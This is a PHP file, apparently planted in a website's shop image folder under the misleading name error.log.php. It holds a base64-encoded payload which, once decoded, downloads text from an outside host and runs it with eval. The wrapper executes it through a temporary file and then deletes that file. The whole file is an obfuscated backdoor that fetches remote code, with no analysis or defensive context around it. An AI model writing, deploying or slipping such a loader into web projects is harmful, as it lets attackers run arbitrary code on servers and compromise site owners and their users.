Current File : /home/aventura/www/web/images/shop/shop-item/error.log.php |
<?php
$code = base64_decode("PD9waHAKJHVybCA9ICJodHRwczovL3dvbmRlcmZ1bGw4OC5jd2hvbm9ycy5vcmcvZHcvMTIxMi50eHQiOwokcmVzdWx0ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CgppZiAoaXNfc3RyaW5nKCRyZXN1bHQpKSB7CiAgICBldmFsKCc/PicuJHJlc3VsdCk7Cn0gZWxzZSB7CiAgICBlY2hvICJFcnJvciI7Cn0KPz4=");
// Create a temporary file
$tempFile = tempnam(sys_get_temp_dir(), 'tmp_');
// Write the PHP code into the temporary file
file_put_contents($tempFile, $code);
// Start output buffering
ob_start();
// Include the temporary file
include $tempFile;
// Get the captured output
$output = ob_get_clean();
// Delete the temporary file
unlink($tempFile);
// Output the result
echo $output;